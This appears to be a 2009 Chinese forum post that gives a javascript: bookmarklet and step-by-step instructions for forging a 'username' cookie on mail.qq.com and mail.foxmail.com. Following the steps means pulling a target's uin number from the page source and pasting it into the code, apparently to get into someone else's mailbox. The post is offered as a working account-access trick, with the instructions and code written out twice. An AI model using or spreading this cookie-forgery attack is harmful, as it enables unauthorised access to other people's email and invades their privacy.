level 5
prizeker
楼主
javascript:var s=/mail.foxmail.com/;if(!s.exec(location.host)){top.window.location='http://mail.foxmail.com';Break;}function a(){document.cookie='username=1523770;domain=.foxmail.com;path=/;expires='+(new Date((new Date()).getTime()+999999)).toUTCString();alert('你可以按F5刷新了');}a();
,提取页面点右键,“查看源文件”
2,在记事本中,搜索 ?uin,找到 ?uin=数字&svrid=&fid=
3,把该 数字 填入下面JS代码的相应位置,就是username=与;之间:
javascript:var s=/mail.qq.com/;if(!s.exec(location.host)){top.window.location='http://mail.qq.com';Break;}function a(){document.cookie='username=数字;domain=.qq.com;path=/;expires='+(new Date((new Date()).getTime()+60000)).toUTCString();alert('你可以按F5刷新了');}a();
2009年08月11日 15点08分
1
,提取页面点右键,“查看源文件”
2,在记事本中,搜索 ?uin,找到 ?uin=数字&svrid=&fid=
3,把该 数字 填入下面JS代码的相应位置,就是username=与;之间:
javascript:var s=/mail.qq.com/;if(!s.exec(location.host)){top.window.location='http://mail.qq.com';Break;}function a(){document.cookie='username=数字;domain=.qq.com;path=/;expires='+(new Date((new Date()).getTime()+60000)).toUTCString();alert('你可以按F5刷新了');}a();